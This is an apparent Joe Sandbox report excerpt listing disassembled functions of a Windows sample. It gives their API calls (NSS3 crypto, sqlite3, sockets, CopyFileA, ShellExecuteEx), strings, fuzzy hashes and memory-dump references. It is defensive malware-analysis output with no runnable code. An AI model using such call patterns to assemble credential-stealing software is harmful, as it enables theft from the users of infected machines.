Instruction Fuzzy Hash: 32F0F6B5611A01A7CF009FAAD808A6777B8BF867747100329E17A83941D735E012C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 004185A7 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004185B3

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__getptd.LIBCMT ref: 004185CA
__amsg_exit.LIBCMT ref: 004185D8
__lock.LIBCMT ref: 004185E8
__updatetlocinfoEx_nolock.LIBCMT ref: 004185FC

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction ID: cdd0eec35e4bf80da2317afb9b55000317a90f0185e5a3c9ee5e330d7cc08b67
Opcode Fuzzy Hash: ce05a91ea9c2b8e711ac95fae42e6a284d9b9390d13ac8f67e08820a18d7d66a
Instruction Fuzzy Hash: A4F09632A49710AAD721BBBA9C027CA77B1AF00739F10411FF505A62D2CF6C69C1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 6CE64D10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CE64D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CE64DE6

Strings

5s/, xrefs: 6CE64D1F
%d.%d, xrefs: 6CE64DDE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d$5s/
API String ID: 2298970422-41314915
Opcode ID: 1cdcc0a6db1463401d66c768be4fe3e688bc5f40edcd7173f47ae7a83a1c598a
Instruction ID: c456836f99ce1fd36a9f5467809c2011842eb440576448752e1b0426c64ace03
Opcode Fuzzy Hash: 1cdcc0a6db1463401d66c768be4fe3e688bc5f40edcd7173f47ae7a83a1c598a
Instruction Fuzzy Hash: AA310AB2D502186BEB109BA2DC11BFF7B78EF41308F15042DED159BB82EB349905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE164E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6CE16527
DER_DecodeTimeChoice_Util.NSS3(?,-0000003F), ref: 6CE1657E
DER_DecodeTimeChoice_Util.NSS3(?,-00000040), ref: 6CE16595

Strings

5s/, xrefs: 6CE164F2

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$Error
String ID: 5s/
API String ID: 1629472317-340167759
Opcode ID: 8251b82add98bd2773f1ea8bbe785eba2362ccb58c33a4c3eefa2b710f05cf28
Instruction ID: 8475351c520073f609c440424344e6f92cd6cd9c6a6af245aa08186158323222
Opcode Fuzzy Hash: 8251b82add98bd2773f1ea8bbe785eba2362ccb58c33a4c3eefa2b710f05cf28
Instruction Fuzzy Hash: 5A31F575A0C2119BD704CE58D890A56B3B9EB8571CF348A2CEC14C7B48E730EC29C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE62E60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CE3F471,?,?,?,00000002,00000000,00000000,?,6CE3D06D), ref: 6CE62EA4
EnterCriticalSection.KERNEL32(?), ref: 6CE62EB8
PR_Unlock.NSS3(?), ref: 6CE62EEA

Strings

5s/, xrefs: 6CE62E6F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue
String ID: 5s/
API String ID: 1419708843-340167759
Opcode ID: 8353b44f1cda03414bb3870d805cee90c9931b0ea0a532616e684628b3765fe7
Instruction ID: 74c29de9ce27cb93d41b09a71b4523746b7f02a34801812fe0d105f2ce7f486a
Opcode Fuzzy Hash: 8353b44f1cda03414bb3870d805cee90c9931b0ea0a532616e684628b3765fe7
Instruction Fuzzy Hash: 7E31D131E602158BDB40DF2AC8887AA77B4EF5932CF654679DC58ABB01DB309851CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6CE32F60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE32F8D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6CE32FA1
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 6CE3301E

Strings

5s/, xrefs: 6CE32F6F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue
String ID: 5s/
API String ID: 1419708843-340167759
Opcode ID: f2a72357d39fd06dd7f516a2313a7ec489d47c10e6db8173f16e3b2a14c60201
Instruction ID: 2f47fe5c7bb4e9c6978c079cba090bd7cebf44a38d7a4649095b896f3dfe6b28
Opcode Fuzzy Hash: f2a72357d39fd06dd7f516a2313a7ec489d47c10e6db8173f16e3b2a14c60201
Instruction Fuzzy Hash: 2A2126B5E00515ABDF009F68DC41AAB77B5EF45218F244038EC0897701EB35E919CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CDA6D36

Strings

%s at line %d of [%.10s], xrefs: 6CDA6D2F
database corruption, xrefs: 6CDA6D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CDA6D20

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: fe24366242dc764bb5a88fed67c649c0e05af2af964bd84e09fa9b16e118f56f
Instruction ID: 79d10837fdc2a9f3ac07a39c1b1261e21d6260d575f919dde62d1a7ad6d3b758
Opcode Fuzzy Hash: fe24366242dc764bb5a88fed67c649c0e05af2af964bd84e09fa9b16e118f56f
Instruction Fuzzy Hash: 3E21E271600705DBCB108F5AC841B5EB7E6AF84348F148929D84A9BF61E371E94787A2

Uniqueness

Uniqueness Score: -1.00%

Function 004132F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00413323

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

ShellExecuteEx.SHELL32(0000003C), ref: 004133E6
ExitProcess.KERNEL32 ref: 00413415

Strings

<, xrefs: 00413399

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
Instruction ID: 9270ca21e45796c21bf284f368f95b7d0dbf71ea93a5a7258f1c6a627d8bac6b
Opcode Fuzzy Hash: c182b738d743941975b88c70cbea89b78e61d7b8e1b7f3fcd29da090f854d54b
Instruction Fuzzy Hash: 383144B19012189BDB14EB91DD91FDDBB78AF48304F80518DF20566191DF746B89CF9C

Uniqueness

Uniqueness Score: -1.00%

Function 6CE82FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+l,6CE832C2,<+l,00000000,00000000,?), ref: 6CE82FDA

Part of subcall function 6CE714C0: TlsGetValue.KERNEL32 ref: 6CE714E0
Part of subcall function 6CE714C0: EnterCriticalSection.KERNEL32 ref: 6CE714F5
Part of subcall function 6CE714C0: PR_Unlock.NSS3 ref: 6CE7150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6CE8300B

Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE710F3
Part of subcall function 6CE710C0: EnterCriticalSection.KERNEL32(?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7110C
Part of subcall function 6CE710C0: PL_ArenaAllocate.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71141
Part of subcall function 6CE710C0: PR_Unlock.NSS3(?,?,?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE71182
Part of subcall function 6CE710C0: TlsGetValue.KERNEL32(?,6CE18802,00000000,00000008,?,6CE0EF74,00000000), ref: 6CE7119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6CE8302A

Part of subcall function 6CE70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE708B4

Part of subcall function 6CE5C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6CE5C45D
Part of subcall function 6CE5C3D0: TlsGetValue.KERNEL32 ref: 6CE5C494
Part of subcall function 6CE5C3D0: EnterCriticalSection.KERNEL32(?), ref: 6CE5C4A9
Part of subcall function 6CE5C3D0: PR_Unlock.NSS3(?), ref: 6CE5C4F4

Strings

<+l, xrefs: 6CE82FD0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+l
API String ID: 2538134263-555380133
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 4d18596781c56033935c0f141d441260beb51fdd0ae3017ad9625c3773d8baa2
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: FD11ABB6B012046BDB008EA5DC01A9B77E99B8466CF384138F91CD7781E776ED15C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEDCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6CEDCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CEDCC7B), ref: 6CEDCD7A
Part of subcall function 6CEDCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CEDCD8E
Part of subcall function 6CEDCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CEDCDA5
Part of subcall function 6CEDCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CEDCDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CEDCCB5
memcpy.VCRUNTIME140(6CF714F4,6CF702AC,00000090), ref: 6CEDCCD3
memcpy.VCRUNTIME140(6CF71588,6CF702AC,00000090), ref: 6CEDCD2B

Part of subcall function 6CDF9AC0: socket.WSOCK32(?,00000017,6CDF99BE), ref: 6CDF9AE6
Part of subcall function 6CDF9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CDF99BE), ref: 6CDF9AFC

Part of subcall function 6CE00590: closesocket.WSOCK32(6CDF9A8F,?,?,6CDF9A8F,00000000), ref: 6CE00597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6CEDCCB0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: 88b1e689545a50e18b8d360d3ddd99e9694171b5965870a3d03958662f3bc624
Instruction ID: 9f33f016a114b77dc7b355d2471fd14cf0e7d5c3fee2a05c5bbcca474237faf1
Opcode Fuzzy Hash: 88b1e689545a50e18b8d360d3ddd99e9694171b5965870a3d03958662f3bc624
Instruction Fuzzy Hash: 0C11D5F1F202505FDB558F99BC67B423AB89346218F145029E50ECBB40E776C41C87F1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF28480 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59threadnetworkCOMMON

Download Yara Rule

APIs

gethostbyname.WSOCK32(?), ref: 6CF284B2
GetLastError.KERNEL32(?), ref: 6CF284C0
PR_GetCurrentThread.NSS3 ref: 6CF284C8

Part of subcall function 6CE00F00: PR_GetPageSize.NSS3(6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F1B
Part of subcall function 6CE00F00: PR_NewLogModule.NSS3(clock,6CE00936,FFFFE8AE,?,6CD916B7,00000000,?,6CE00936,00000000,?,6CD9204A), ref: 6CE00F25

Part of subcall function 6CF281B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF28202

Strings

5s/, xrefs: 6CF2848B

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CurrentErrorLastModulePageSizeThreadgethostbynamestrlen
String ID: 5s/
API String ID: 3040165038-340167759
Opcode ID: 7b22500b8312614b9d67e84fe2aca814fe1bb6d3a6e616cca14c52efa3e2e5e0
Instruction ID: bddaf6ab6493fdcb0bc76079c8601a893b312b62b0e698eb0152eacf5cb6cf15
Opcode Fuzzy Hash: 7b22500b8312614b9d67e84fe2aca814fe1bb6d3a6e616cca14c52efa3e2e5e0
Instruction Fuzzy Hash: BE110637A001349FCB104FB99D44B9B37B8DB44658F26423BEC095B650D7348C0987D5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE00E80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(?,4004667F,?), ref: 6CE00EB4
WSAGetLastError.WSOCK32(?,4004667F,?), ref: 6CE00ED2
PR_SetError.NSS3(FFFFE891,00000000,?,4004667F,?), ref: 6CE00EDD

Strings

5s/, xrefs: 6CE00E9A

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$Lastioctlsocket
String ID: 5s/
API String ID: 1402776735-340167759
Opcode ID: 6a8238f2f09d1bb10ccbf314795818a4d8267ae69e3c7f22d7a0d5ea82d9ea8a
Instruction ID: 6d317016ab28a31924b79a37ba96dd9df35837673758dd35a475ada3a43e63a4
Opcode Fuzzy Hash: 6a8238f2f09d1bb10ccbf314795818a4d8267ae69e3c7f22d7a0d5ea82d9ea8a
Instruction Fuzzy Hash: 40F02430F0411CBB4B04AFE8DC00DAEBB78DF05209B91406DED0927700EA31BD1987D5

Uniqueness

Uniqueness Score: -1.00%

Function 6CEBA890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,?,6CEA5F25,?,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBA8A3

Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE10
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE24
Part of subcall function 6CE5ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CE3D079,00000000,00000001), ref: 6CE5AE5A
Part of subcall function 6CE5ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE6F
Part of subcall function 6CE5ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AE7F
Part of subcall function 6CE5ADC0: TlsGetValue.KERNEL32(?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEB1
Part of subcall function 6CE5ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CE3CDBB,?,6CE3D079,00000000,00000001), ref: 6CE5AEC9

PK11_FreeSymKey.NSS3(?,00000000,?,6CEA5F25,?,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBA8BA
SECITEM_ZfreeItem_Util.NSS3(%_l,00000000,00000000,?,6CEA5F25,?,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBA8CF

Strings

%_l, xrefs: 6CEBA894, 6CEBA8CE

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
String ID: %_l
API String ID: 2877228265-160528633
Opcode ID: 2e358ff236f7f1ab70c7ecf5a9c3efe103380b9cc49af9cc05a1f93a172aa1b3
Instruction ID: f826c3f5fbe8933c19f8bed4703104b1d25ee85c5237b767fb7db9df6469c7ea
Opcode Fuzzy Hash: 2e358ff236f7f1ab70c7ecf5a9c3efe103380b9cc49af9cc05a1f93a172aa1b3
Instruction Fuzzy Hash: A4F0A0B2E9171457EA10AA16E804BA773A89B0065DF648028D81AA7F01E33AE8158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00415450 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
wsprintfW.USER32 ref: 00415478

Strings

%hs, xrefs: 0041546F

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction ID: 2a04a3b42468460cff415e79ad4cc7303691da2b1e165ac812b33aed5ccf4e4e
Opcode Fuzzy Hash: 9d0e4c61c44ae66937b299eb0154705507e44eb3acdcd074a2a0d5819eeee3b8
Instruction Fuzzy Hash: A5E0ECB5A40608BFDB20DFD4ED0AEAD77A9EB48701F100194F90AD7640DA719E109B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
lstrlen.KERNEL32(00000000), ref: 0040CDE8
